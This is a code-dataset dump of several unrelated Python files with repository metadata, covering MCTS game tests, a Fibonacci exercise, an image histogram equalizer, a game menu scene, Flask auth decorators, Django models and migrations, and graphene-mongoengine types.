def test_choose_moves_at_random():
""" Early moves are chosen from a weighted random population. """
np.random.seed(0)
start_state = TicTacToeState()
state1 = TicTacToeState("""\
...
...
X..
""")
player = MctsPlayer(start_state,
iteration_count=80,
heuristic=EarlyChoiceHeuristic())
moves = set()
for _ in range(10):
move = player.choose_move(state1)
moves.add(move)
player.search_manager.reset()
assert 1 < len(moves)
def test_choose_move_no_iterations():
np.random.seed(0)
start_state = Connect4State()
state1 = Connect4State("""\
.......
.......
.......
...XX..
OXOXO..
XOXOXOO
""")
test_count = 400
expected_count = test_count/7
expected_low = expected_count * 0.9
expected_high = expected_count * 1.1
move_counts = Counter()
for _ in range(test_count):
player = MctsPlayer(start_state, iteration_count=0)
move = player.choose_move(state1)
move_counts[move] += 1
assert expected_low < move_counts[2] < expected_high
def test_analyse_finished_game():
board = TicTacToeState("""\
OXO
XXO
XOX
""")
heuristic = Playout()
expected_value = 0 # A tie
expected_policy = [1/9] * 9
value, policy = heuristic.analyse(board)
assert expected_value == value
assert expected_policy == policy.tolist()
def test_search_manager_reuses_node():
start_state = TicTacToeState()
manager = SearchManager(start_state, Playout())
manager.search(start_state, iterations=10)
move = manager.get_best_move()
state2 = start_state.make_move(move)
node = manager.current_node
first_value_count = node.value_count
manager.search(state2, iterations=10)
second_value_count = node.value_count
assert first_value_count > 0
assert first_value_count + 10 == second_value_count
def test_search_manager_with_opponent():
""" Like when opponent is not sharing the SearchManager. """
start_state = TicTacToeState()
manager = SearchManager(start_state, Playout())
manager.search(start_state, iterations=10)
node = manager.current_node.children[0] # Didn't call get_best_move().
move = 0
state2 = start_state.make_move(move)
first_value_count = node.value_count
manager.search(state2, iterations=10)
second_value_count = node.value_count
assert first_value_count > 0
assert first_value_count + 10 == second_value_count
def test_annotate():
start_state = TicTacToeState()
player = MctsPlayer(start_state,
iteration_count=10,
heuristic=FirstChoiceHeuristic())
player.choose_move(start_state)
move_probabilities = player.get_move_probabilities(start_state)
best_move, best_probability, best_count, best_value = move_probabilities[0]
assert best_move == '1A'
assert best_probability == approx(0.999013)
assert best_count == 9
assert best_value == approx(2/9)
def test_create_training_data():
start_state = TicTacToeState()
manager = SearchManager(start_state, FirstChoiceHeuristic())
expected_boards, expected_outputs = zip(*[
[start_state.get_spaces(),
np.array([1., 0., 0., 0., 0., 0., 0., 0., 0., -1.])],
[TicTacToeState("""\
X..
...
...
""").get_spaces(), np.array([0., 1., 0., 0., 0., 0., 0., 0., 0., 1.])],
[TicTacToeState("""\
XO.
...
...
""").get_spaces(), np.array([0., 0., 1., 0., 0., 0., 0., 0., 0., -1.])],
[TicTacToeState("""\
XOX
...
...
""").get_spaces(), np.array([0., 0., 0., 1., 0., 0., 0., 0., 0., 1.])],
[TicTacToeState("""\
XOX
O..
...
""").get_spaces(), np.array([0., 0., 0., 0., 1., 0., 0., 0., 0., -1.])],
[TicTacToeState("""\
XOX
OX.
...
""").get_spaces(), np.array([0., 0., 0., 0., 0., 1., 0., 0., 0., 1.])],
[TicTacToeState("""\
XOX
OXO
...
""").get_spaces(), np.array([0., 0., 0., 0., 0., 0., 1., 0., 0., -1.])]])
expected_boards = np.stack(expected_boards)
expected_outputs = np.stack(expected_outputs)
boards, outputs = manager.create_training_data(iterations=1, data_size=7)
assert repr(boards) == repr(expected_boards)
assert repr(outputs) == repr(expected_outputs)
def test_win_scores_one():
""" Expose bug where search continues after a game-ending position. """
state1 = TicTacToeState("""\
..X
XX.
OO.
""")
player = MctsPlayer(TicTacToeState(), state1.X_PLAYER, iteration_count=100)
move = player.choose_move(state1)
search_node1 = player.search_manager.current_node.parent
for child_node in search_node1.children:
if child_node.move == 8:
assert child_node.average_value == 1.0
assert move == 8
def test_choose_move_sets_current_node():
np.random.seed(0)
start_state = Connect4State()
state1 = Connect4State("""\
.......
.......
.......
.......
OXOXOXO
XOXOXOX
""")
player = MctsPlayer(start_state, iteration_count=20)
move1 = player.choose_move(state1)
current_node1 = player.search_manager.current_node
state2 = state1.make_move(move1)
move2 = player.choose_move(state2)
current_node2 = player.search_manager.current_node
state3 = state2.make_move(move2)
assert current_node1.game_state == state2
assert current_node2.game_state == state3
| 24.900677 | 98 | 0.658327 | 1,304 | 0.118212 | 0 | 0 | 0 | 0 | 0 | 0 | 1,235 | 0.111957 |
e2cfc3393806f7bb4f40dc3f9cc091f1aa70db37 | 387 | py | Python | exercicios/ex 061 a 070/ex063.py | CarlosWillian/python | f863578245fbf402e5b46f844a247355afed0d62 | [
"MIT"
] | null | null | null | exercicios/ex 061 a 070/ex063.py | CarlosWillian/python | f863578245fbf402e5b46f844a247355afed0d62 | [
"MIT"
] | null | null | null | exercicios/ex 061 a 070/ex063.py | CarlosWillian/python | f863578245fbf402e5b46f844a247355afed0d62 | [
"MIT"
] | null | null | null | print('Sequência de Fibonacci')
print('='*24)
t = int(input('Número de termos da sequência: '))
print('='*24)
c = 3
termo1 = 0
termo2 = 1
print('A sequência é ({}, {}, '.format(termo1, termo2), end='')
while c <= t:
termo3 = termo1 + termo2
print('{}'.format(termo3), end='')
print(', ' if c < t else '', end='')
c += 1
termo1 = termo2
termo2 = termo3
print(')')
| 22.764706 | 63 | 0.563307 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 112 | 0.285714 |
e2cfeb3a6d764e8add262f7e0e146ac4bae2ba59 | 3,992 | py | Python | Histogram_Equalization/equalizer.py | CSEMN/FEE_Image_Processing | b060720fef44585a43307c9e81934a1877ddbc5f | [
"MIT"
] | null | null | null | Histogram_Equalization/equalizer.py | CSEMN/FEE_Image_Processing | b060720fef44585a43307c9e81934a1877ddbc5f | [
"MIT"
] | null | null | null | Histogram_Equalization/equalizer.py | CSEMN/FEE_Image_Processing | b060720fef44585a43307c9e81934a1877ddbc5f | [
"MIT"
] | null | null | null | #This code is a practice on Histogram Equalization
#Coded by: CSEMN (Mahmoud Nasser - Sec 4)
#Supervised by: Dr.Mohamed Berbar
__author__ = 'Mahmoud Nasser'
from tkinter import *
from tkinter import ttk
import cv2 as cv # if not installed please consider running : pip install opencv-python
from PIL import ImageTk,Image # if not installed please consider running : pip install Pillow
import matplotlib # if not installed please consider running : pip install matplotlib
matplotlib.use('TkAgg')
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
class AppGui:
def __init__(self,root:Tk) :
self.TARGET_IMG_PATH="target.jpg"
self.RESULT_IMG_PATH="res.jpg"
self.root=root
self.resFrame=None
self.configWindow(root)
self.buildMethodSelectionFrame(root)
self.buildOriginalImgViewr(root,self.TARGET_IMG_PATH)
#configur window size and make it fixed.
def configWindow(self,window:Tk):
window.title("Histogram Equalizer")
window.geometry('800x600')
window.resizable(0,0)
def buildMethodSelectionFrame(self,window):
self.methodSelectFrame=LabelFrame(window,text="Equalization Method")
methodSelected=IntVar()
methodSelected.set(0)
ttk.Radiobutton(self.methodSelectFrame,text="OpenCV Equalizaer",variable=methodSelected,value=1,command=self.performOpenCvHistEqualizer).pack(side=LEFT)
ttk.Radiobutton(self.methodSelectFrame,text="Clahe Equalizer",variable=methodSelected,value=2,command=self.performClahe).pack(side=RIGHT)
self.methodSelectFrame.pack(side=TOP,pady=20)
def performOpenCvHistEqualizer(self):
img = cv.imread(self.TARGET_IMG_PATH,0)
equalized = cv.equalizeHist(img)
cv.imwrite(self.RESULT_IMG_PATH,equalized)
self.buildResultlImgViewr("OpenCV Equalizer",self.root,self.RESULT_IMG_PATH)
def performClahe(self):
img = cv.imread(self.TARGET_IMG_PATH,0)
clahe = cv.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
equalized = clahe.apply(img)
cv.imwrite(self.RESULT_IMG_PATH,equalized)
self.buildResultlImgViewr("Clahe Equalizer",self.root,self.RESULT_IMG_PATH)
def buildOriginalImgViewr(self,window,img):
frame=LabelFrame(window,text="Original Image")
#to view the image itself.
im = Image.open(img).resize((300,200), Image.ANTIALIAS)
self.photo = ImageTk.PhotoImage(im)
Label(frame,image=self.photo).pack(side=TOP,pady=20)
#to view image hisotgram
cvImg = cv.imread(img,0)
fig = Figure(figsize=(5,4), dpi=70)
a = fig.add_subplot(111)
a.hist(cvImg.flatten(),256,[0,256], color = 'r')
canvas = FigureCanvasTkAgg(fig, master=frame)
canvas.draw()
canvas.get_tk_widget().pack(side=BOTTOM)
frame.pack(padx=20,side=LEFT)
def buildResultlImgViewr(self,methodName,window,img):
#to make sure no other result frame shown
if(self.resFrame != None):
for widget in self.resFrame.winfo_children():
widget.destroy()
self.resFrame.pack_forget()
#view the result image
self.resFrame=LabelFrame(window,text= methodName+" Image")
im = Image.open(img).resize((300,200), Image.ANTIALIAS)
self.resPhoto = ImageTk.PhotoImage(im)
Label(self.resFrame,image=self.resPhoto).pack(side=TOP,pady=20)
#view histogram of result image
cvImg = cv.imread(img,0)
fig = Figure(figsize=(5,4), dpi=70)
a = fig.add_subplot(111)
a.hist(cvImg.flatten(),256,[0,256], color = 'b')
canvas = FigureCanvasTkAgg(fig, master=self.resFrame)
canvas.draw()
canvas.get_tk_widget().pack(side=BOTTOM)
self.resFrame.pack(padx=20,side=RIGHT)
if __name__ == '__main__':
root=Tk()
AppGui(root)
root.mainloop()
| 38.384615 | 160 | 0.677605 | 3,312 | 0.829659 | 0 | 0 | 0 | 0 | 0 | 0 | 714 | 0.178858 |
e2d0618f948725a9592d18db6089a0036d0d5efa | 3,336 | py | Python | divineoasis/scenes/main_menu_manager.py | wsngamerz/Divine-Oasis-RPG | a554431f6eee65ee109d9c1d7f67c12eaba8c974 | [
"MIT"
] | 1 | 2019-07-17T23:26:10.000Z | 2019-07-17T23:26:10.000Z | divineoasis/scenes/main_menu_manager.py | wsngamerz/Divine-Oasis-RPG | a554431f6eee65ee109d9c1d7f67c12eaba8c974 | [
"MIT"
] | 8 | 2019-06-04T15:26:37.000Z | 2019-07-17T23:30:35.000Z | divineoasis/scenes/main_menu_manager.py | wsngamerz/Divine-Oasis-RPG | a554431f6eee65ee109d9c1d7f67c12eaba8c974 | [
"MIT"
] | 1 | 2019-06-04T15:17:45.000Z | 2019-06-04T15:17:45.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: scenes/main_menu_manager.py
# -------------------
# Divine Oasis
# Text Based RPG Game
# By wsngamerz
# -------------------
import logging
import random
from divineoasis.assets import Assets
from divineoasis.audio_manager import AudioManager
from divineoasis.scene import Scene
from divineoasis.scenes.main_menu.menu_scene import MenuScene
from divineoasis.scenes.main_menu.options_scene import OptionsScene
from pyglet.graphics import Batch, OrderedGroup
from pyglet.sprite import Sprite
from pyglet.window import Window, FPSDisplay
class MainMenu(Scene):
def __init__(self, assets: Assets, window: Window, audio_manager: AudioManager):
Scene.__init__(self, assets, window, audio_manager)
self.logger = logging.getLogger(__name__)
self.current_scene = None
self.sub_scenes = {}
self.add_sub_scene(MenuScene(self.assets, self.window, self.audio_manager))
self.add_sub_scene(OptionsScene(self.assets, self.window, self.audio_manager))
self.fps_display = FPSDisplay(self.window)
self.fps_display.label.y = 680
self.fps_display.label.color = (255, 255, 255, 255)
# Background sprite & image
self.background_image = None
self.background_sprite = None
# Pos for moving background
self.bg_pos = [0, 0]
def start_scene(self):
# Load the music!
self.load_audio()
# Start the main menu scene
self.switch_sub_scene("MenuScene")
# Start fancy menu stuff
self.load_background()
self.play_audio()
def add_sub_scene(self, scene: Scene):
sub_scene_name = scene.__class__.__name__
scene.switch_sub_scene = self.switch_sub_scene
self.sub_scenes[sub_scene_name] = scene
def load_audio(self):
songs = [
"menu.ove_melaa_italo_unlimited",
"menu.ove_melaa_super_ninja_assasin",
"menu.ove_melaa_power_of_thy_yes"
]
random.shuffle(songs)
self.logger.debug(f"Loading menu songs: { songs }")
self.audio_manager.load_songs(songs, loop=True)
def play_audio(self):
self.audio_manager.play_songs()
def load_background(self):
self.background_image = self.assets.get_pyglet_image("user_interface.background")
self.initiate_background()
def initiate_background(self):
if not self.background_image:
self.load_background()
self.background_sprite = Sprite(self.background_image, x=0, y=0,
batch=self.current_scene.batch, group=self.current_scene.background)
def switch_sub_scene(self, sub_scene_name: str):
if sub_scene_name in self.sub_scenes:
self.window.remove_handlers(self.current_scene)
self.current_scene = self.sub_scenes[sub_scene_name]
self.window.push_handlers(self.current_scene)
self.initiate_background()
self.current_scene.start_scene()
def update(self, dt: float):
self.bg_pos[0] -= 2
self.bg_pos[1] -= 1
if self.bg_pos[0] <= -4800:
self.bg_pos = [0, 0]
self.background_sprite.update(self.bg_pos[0], self.bg_pos[1])
self.current_scene.update(dt)
self.fps_display.draw()
| 31.17757 | 89 | 0.666067 | 2,734 | 0.819544 | 0 | 0 | 0 | 0 | 0 | 0 | 469 | 0.140588 |
e2d0873043c167f2f68be47cd5ad16d9ad3d23a9 | 469 | py | Python | myadsp/emails.py | kelockhart/myADSPipeline | 21c453a6d7c35d7ce019a71854010fb80b1bc56f | [
"MIT"
] | null | null | null | myadsp/emails.py | kelockhart/myADSPipeline | 21c453a6d7c35d7ce019a71854010fb80b1bc56f | [
"MIT"
] | null | null | null | myadsp/emails.py | kelockhart/myADSPipeline | 21c453a6d7c35d7ce019a71854010fb80b1bc56f | [
"MIT"
] | null | null | null | """email templates"""
from builtins import object
class Email(object):
"""
Data structure that contains email content data
"""
msg_plain = ''
msg_html = ''
subject = u''
salt = ''
class myADSTemplate(Email):
"""
myADS email template
"""
msg_plain = """
SAO/NASA ADS: myADS Personal Notification Service Results
{payload}
"""
msg_html = """{payload}"""
subject = u'myADS Notification'
| 18.038462 | 65 | 0.575693 | 414 | 0.882729 | 0 | 0 | 0 | 0 | 0 | 0 | 269 | 0.573561 |
e2d0f35a2efdab82ab362a625cfe59a0e847406a | 1,914 | py | Python | getAddrFromOS.py | OpenAddressesUK/OSSpatialResearch | a0156278f35330088c6e8f89cbf32601444872d3 | [
"MIT"
] | 1 | 2015-05-13T10:52:22.000Z | 2015-05-13T10:52:22.000Z | getAddrFromOS.py | OpenAddressesUK/OSSpatialResearch | a0156278f35330088c6e8f89cbf32601444872d3 | [
"MIT"
] | null | null | null | getAddrFromOS.py | OpenAddressesUK/OSSpatialResearch | a0156278f35330088c6e8f89cbf32601444872d3 | [
"MIT"
] | null | null | null | #
# Open addresses Spatial Research
# Display Candidate Address Components From OS Open Map & Open Roads
#
#
# Version 1.0 (Python) in progress
# Author John Murray
# Licence MIT
#
# Purpose Display Candidate Address Components
#
import MySQLdb
import collections
import sys
# Database configuration
username = "****"
password = "********"
hostname = "********"
database = "****"
if len(sys.argv) != 3:
print "Invalid arguments. Usage is 'python getAddrFromOS.py postcode buffer'"
sys.exit()
else:
postcode = sys.argv[1]
buf_size = int(sys.argv[2])
dbConn = MySQLdb.connect(host=hostname,user=username,passwd=password,db=database)
cur = dbConn.cursor()
query = "SELECT `name1`,`formOfWay`,`length`,`formsPart`,ST_DISTANCE(`GEOMETRY`,(SELECT `GEOMETRY`FROM `gaz_opennames` WHERE `OS_ID` = '"+postcode+"')) AS `Distance` FROM `spa_roadlink` WHERE `ID` IN (SELECT `ID` FROM `spa_roadlink` WHERE ST_INTERSECTS(`GEOMETRY`,(SELECT ST_BUFFER(`GEOMETRY`,"+str(buf_size)+") FROM `gaz_opennames` WHERE `OS_ID` = '"+postcode+"'))) ORDER BY `Distance`"
cur.execute(query)
data = cur.fetchall()
streets = []
print "Postcode: "+postcode[0:-3]+" "+postcode[-3:]
print
for d in data:
if d[3] != '':
for s in d[3].split(","):
query = "SELECT `NAME1`, `TYPE`, `LOCAL_TYPE`, `POSTCODE_DISTRICT`, `POPULATED_PLACE`, `DISTRICT_BOROUGH`, `COUNTY_UNITARY`, `REGION`, `COUNTRY`, `RELATED_SPATIAL_OBJECT` FROM `gaz_opennames` WHERE `OS_ID` = '"+s+"'"
cur.execute(query)
for d1 in cur.fetchall():
if d1[0] not in streets:
print "Street: "+d1[0]
print "Settlement: "+d1[4]
print "District: "+d1[5]
print "County: "+d1[6]
print "Distance: "+str(d[4])
print
streets.extend([d1[0]])
| 33 | 387 | 0.603448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 999 | 0.521944 |
e2d1181ba43764099ea9ef3959a87a0948ac70c3 | 2,645 | py | Python | ext/app/decorators.py | FNLF/fnlf-backend | 060d675d7cf8d0eff46af6eb4be7035b8cd68d36 | [
"MIT"
] | 1 | 2015-01-14T22:08:27.000Z | 2015-01-14T22:08:27.000Z | ext/app/decorators.py | FNLF/fnlf-backend | 060d675d7cf8d0eff46af6eb4be7035b8cd68d36 | [
"MIT"
] | 103 | 2015-01-08T13:45:38.000Z | 2022-01-13T00:38:39.000Z | ext/app/decorators.py | FNLF/fnlf-backend | 060d675d7cf8d0eff46af6eb4be7035b8cd68d36 | [
"MIT"
] | null | null | null | """
Custom decorators
=================
Custom decorators for various tasks and to bridge Flask with Eve
"""
from flask import current_app as app, request, Response, abort
from functools import wraps
from ext.auth.tokenauth import TokenAuth
from ext.auth.helpers import Helpers
# Because of circular import in context
from ext.app.eve_helper import eve_abort
class AuthenticationFailed(Exception):
"""Raise custom error"""
class AuthenticationNoToken(Exception):
"""Raise custom error"""
def require_token(allowed_roles=None):
""" Custom decorator for token auth
Wraps the custom TokenAuth class used by Eve and sends it the required param
"""
def decorator(f):
@wraps(f)
def wrapped(*args, **kwargs):
try:
# print(request.headers.get('User-Agent'))
# No authorization in request
# Let it raise an exception
try:
authorization_token = request.authorization.get('username', None)
except Exception as e:
raise AuthenticationFailed
# Do the authentication
# Need to remove prefix + / for request.path
auth = TokenAuth()
auth_result = auth.check_auth(token=authorization_token, # Token
method=request.method,
resource=request.path[len(app.globals.get('prefix')) + 1:],
allowed_roles=allowed_roles)
if auth_result is not True:
raise AuthenticationFailed
# Catch exceptions and handle correctly
except AuthenticationFailed:
eve_abort(401, 'Please provide proper credentials')
except Exception as e:
eve_abort(500, 'Server error')
return f(*args, **kwargs)
return wrapped
return decorator
def require_superadmin():
"""Require user to be in a group of hardcoded user id's
Should use Helpers then get administrators
@TODO: use a switch for ref [superadmin, admin,..]?
@TODO: in ext.auth.helpers define a get_users_in_roles_by_ref(ref)?
"""
def decorator(f):
@wraps(f)
def wrapped(*args, **kwargs):
h = Helpers()
if int(app.globals['user_id']) not in h.get_superadmins(): # [99999]: # # #
eve_abort(401, 'You do not have sufficient privileges')
return f(*args, **kwargs)
return wrapped
return decorator
| 30.402299 | 105 | 0.579206 | 135 | 0.05104 | 0 | 0 | 1,524 | 0.576181 | 0 | 0 | 921 | 0.348204 |
e2d1c534677315f6466e246bf5f311b6dc6c8b9a | 3,978 | py | Python | home/migrations/0046_auto_20190905_0939.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 1 | 2020-04-20T05:37:09.000Z | 2020-04-20T05:37:09.000Z | home/migrations/0046_auto_20190905_0939.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 23 | 2019-03-13T10:54:36.000Z | 2022-03-11T23:33:59.000Z | home/migrations/0046_auto_20190905_0939.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.5 on 2019-09-05 09:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0045_auto_20190409_1450'),
]
operations = [
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='bb_black_score',
field=models.IntegerField(verbose_name='BB Black'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='bb_blue_score',
field=models.IntegerField(verbose_name='BB Blue'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='bb_gold_score',
field=models.IntegerField(verbose_name='BB Gold'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='bb_red_score',
field=models.IntegerField(verbose_name='BB Red'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='bb_white_score',
field=models.IntegerField(verbose_name='BB White'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='cb_black_score',
field=models.IntegerField(verbose_name='CP Black'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='cb_blue_score',
field=models.IntegerField(verbose_name='CP Blue'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='cb_gold_score',
field=models.IntegerField(verbose_name='CP Gold'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='cb_red_score',
field=models.IntegerField(verbose_name='CP Red'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='cb_white_score',
field=models.IntegerField(verbose_name='CP White'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='lb_black_score',
field=models.IntegerField(verbose_name='LB Black'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='lb_blue_score',
field=models.IntegerField(verbose_name='LB Blue'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='lb_gold_score',
field=models.IntegerField(verbose_name='LB Gold'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='lb_red_score',
field=models.IntegerField(verbose_name='LB Red'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='lb_white_score',
field=models.IntegerField(verbose_name='LB White'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='rc_black_score',
field=models.IntegerField(verbose_name='RC Black'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='rc_blue_score',
field=models.IntegerField(verbose_name='RC Blue'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='rc_gold_score',
field=models.IntegerField(verbose_name='RC Gold'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='rc_red_score',
field=models.IntegerField(verbose_name='RC Red'),
),
migrations.AlterField(
model_name='leaguebadgeroundentry',
name='rc_white_score',
field=models.IntegerField(verbose_name='RC White'),
),
]
| 34.894737 | 63 | 0.587733 | 3,885 | 0.976621 | 0 | 0 | 0 | 0 | 0 | 0 | 1,026 | 0.257919 |
e2d285ee4ae38f832b4b1c001f7a02e948846796 | 2,017 | py | Python | setup.py | mzinin/s2e2.python | 1d7776be32a34c37174bbb4257ff99f4c340b7ac | [
"MIT"
] | null | null | null | setup.py | mzinin/s2e2.python | 1d7776be32a34c37174bbb4257ff99f4c340b7ac | [
"MIT"
] | null | null | null | setup.py | mzinin/s2e2.python | 1d7776be32a34c37174bbb4257ff99f4c340b7ac | [
"MIT"
] | null | null | null | #!/bin/sh
# it's a kind of magic to run python with -B key
# https://stackoverflow.com/questions/17458528/why-does-this-snippet-with-a-shebang-bin-sh-and-exec-python-inside-4-single-q
''''exec python3 -B -- "$0" ${1+"$@"} # '''
import os
import re
import setuptools
import setuptools.command.test
import sys
base_path = os.path.dirname(__file__)
with open(os.path.join(base_path, 'src', 's2e2', '__init__.py')) as f:
version = re.compile(r""".*__version__ = ["'](.*?)['"]""", re.S).match(f.read()).group(1)
with open(os.path.join(base_path, 'README.rst')) as f:
readme = f.read()
class PyTest(setuptools.command.test.test):
def initialize_options(self):
setuptools.command.test.test.initialize_options(self)
def run_tests(self):
import pytest
errno = pytest.main(['-v', '-p', 'no:cacheprovider'])
sys.exit(errno)
setuptools.setup(
name='s2e2',
version=version,
description='Simple String Expression Evaluator library',
long_description=readme,
keywords='expression-evaluator string-expression',
author='Mikhail Zinin',
author_email='mzinin@gmail.com',
url='https://github.com/mzinin/s2e2.python',
license='MIT',
packages=['s2e2', 's2e2.functions', 's2e2.operators' ],
package_data={'': ['README.rst']},
package_dir={'': 'src'},
python_requires='>=3.4',
tests_require=['pytest', 'mock'],
test_suite='test',
cmdclass = {'test': PyTest},
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
"Topic :: Software Development :: Libraries",
],
)
| 30.104478 | 124 | 0.630144 | 273 | 0.13535 | 0 | 0 | 0 | 0 | 0 | 0 | 1,000 | 0.495786 |
e2d2993a71706a9f1b56afda9081361dce12073d | 4,613 | py | Python | graphene_mongoengine/types.py | ramarivera/graphene-mongoengine | 1020674233993bba98454b1850f184f7b79a614e | [
"MIT"
] | null | null | null | graphene_mongoengine/types.py | ramarivera/graphene-mongoengine | 1020674233993bba98454b1850f184f7b79a614e | [
"MIT"
] | null | null | null | graphene_mongoengine/types.py | ramarivera/graphene-mongoengine | 1020674233993bba98454b1850f184f7b79a614e | [
"MIT"
] | null | null | null | from collections import OrderedDict
from graphene import Field # , annotate, ResolveInfo
from graphene.relay import Connection, Node
from graphene.types.objecttype import ObjectType, ObjectTypeOptions
from graphene.types.utils import yank_fields_from_attrs
from mongoengine import DoesNotExist
from .converter import convert_mongoengine_field
from .registry import Registry, get_global_registry
from .utils import get_document_fields, is_mongoengine_document, get_query
# pylint: disable=W0622,C0103
def construct_fields(document, registry, only_fields, exclude_fields):
fields = OrderedDict()
document_fields = get_document_fields(document)
for name, field in document_fields.items():
is_not_in_only = only_fields and name not in only_fields
is_excluded = name in exclude_fields
if is_not_in_only or is_excluded:
continue
converted_field = convert_mongoengine_field(field, registry)
print(name)
fields[name] = converted_field
# # Get all the columns for the relationships on the model
# for relationship in inspected_model.relationships:
# is_not_in_only = only_fields and relationship.key not in only_fields
# # is_already_created = relationship.key in options.fields
# is_excluded = relationship.key in exclude_fields # or is_already_created
# if is_not_in_only or is_excluded:
# # We skip this field if we specify only_fields and is not
# # in there. Or when we exclude this field in exclude_fields
# continue
# converted_relationship = convert_sqlalchemy_relationship(relationship, registry)
# name = relationship.key
# fields[name] = converted_relationship
return fields
class MongoEngineObjectTypeOptions(ObjectTypeOptions):
document = None # type: Document
registry = None # type: Registry
connection = None # type: Type[Connection]
id = None # type: str
class MongoEngineObjectType(ObjectType):
@classmethod
def __init_subclass_with_meta__(cls, document=None, registry=None, skip_registry=False,
only_fields=(), exclude_fields=(), connection=None,
use_connection=None, interfaces=(), id=None, **options):
assert is_mongoengine_document(document), (
f"You need to pass a valid MongoEngine Document in {cls.__name__}.Meta, "
f"received '{document}'."
)
if not registry:
registry = get_global_registry()
assert isinstance(registry, Registry), (
f'The attribute registry in {cls.__name__} needs to be an instance of '
f'Registry, received "{registry}".'
)
mongoengine_fields = yank_fields_from_attrs(
construct_fields(document, registry, only_fields, exclude_fields),
_as=Field,
)
if use_connection is None and interfaces:
use_connection = any((issubclass(interface, Node) for interface in interfaces))
if use_connection and not connection:
# We create the connection automatically
connection = Connection.create_type(f'{cls.__name__}Connection', node=cls)
if connection is not None:
assert issubclass(connection, Connection), (
f'The connection must be a Connection. Received {connection.__name__}'
)
_meta = MongoEngineObjectTypeOptions(cls)
_meta.document = document
_meta.registry = registry
_meta.fields = mongoengine_fields
_meta.connection = connection
_meta.id = id or 'id'
super(MongoEngineObjectType, cls).__init_subclass_with_meta__(
_meta=_meta,
interfaces=interfaces,
**options
)
if not skip_registry:
registry.register(cls)
@classmethod
def is_type_of(cls, root, info):
if isinstance(root, cls):
return True
if not is_mongoengine_document(root):
raise Exception(f'Received incompatible instance "{root}".')
return isinstance(root, cls._meta.document)
@classmethod
def get_query(cls, info):
""" Gets QuerySet for this type's document """
document = cls._meta.document
return get_query(document, info.context)
@classmethod
def get_node(cls, info, id):
""" Returns document to wrap in Node """
try:
return cls.get_query(info).get(id)
except DoesNotExist:
return None | 34.94697 | 92 | 0.661825 | 2,827 | 0.612833 | 0 | 0 | 2,554 | 0.553653 | 0 | 0 | 1,272 | 0.275742 |
e2d58ed4d184954f58d06c57f5681f8b2aa9469e | 1,936 | py | Python | apps/test/models.py | catveloper/dynamic_form_generator | be2704cff5ee0f93461cf6c82e47dc1a39b9a98e | [
"MIT"
] | null | null | null | apps/test/models.py | catveloper/dynamic_form_generator | be2704cff5ee0f93461cf6c82e47dc1a39b9a98e | [
"MIT"
] | null | null | null | apps/test/models.py | catveloper/dynamic_form_generator | be2704cff5ee0f93461cf6c82e47dc1a39b9a98e | [
"MIT"
] | null | null | null | from django.conf import settings
from django.db import models
from django.utils.translation import gettext_lazy as _
class Workspace(models.Model):
code = models.CharField(_('코드'), max_length=40, unique=True, editable=False)
name = models.CharField(_('이름'), max_length=50, unique=True)
owner = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='workspaces_owned',
on_delete=models.PROTECT, verbose_name=_('소유자')
)
is_active = models.BooleanField(_('활성'), default=False)
class Meta:
verbose_name = _('워크스페이스')
verbose_name_plural = _('워크스페이스')
def __str__(self):
return self.name
class Project(models.Model):
workspace = models.ForeignKey(
'Workspace', related_name='projects',
on_delete=models.PROTECT, verbose_name=_('워크스페이스')
)
title = models.CharField(_('제목'), max_length=200)
category = models.CharField(
_('카테고리'), max_length=50,
choices=[
('image_annotation', _('이미지 어노테이션')),
('video_annotation', _('비디오 어노테이션')),
('pcd_annotation', _('PCD 어노테이션'))
]
)
class Meta:
verbose_name = _('프로젝트')
verbose_name_plural = _('프로젝트')
def __str__(self):
return self.title
class Task(models.Model):
class Meta:
verbose_name = '테스크'
project = models.ForeignKey(
'Project', related_name='tasks',
on_delete=models.CASCADE, verbose_name='프로젝트'
)
name = models.CharField(max_length=30)
class Annotation(models.Model):
task = models.ForeignKey(
'Task', related_name='annotations',
on_delete=models.CASCADE
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='annotations',
on_delete=models.CASCADE
)
data = models.JSONField(default=dict, blank=True)
long_text = models.TextField(verbose_name='긴문장', help_text='헬프텍스트')
| 27.267606 | 80 | 0.644112 | 1,961 | 0.938278 | 0 | 0 | 0 | 0 | 0 | 0 | 412 | 0.197129 |
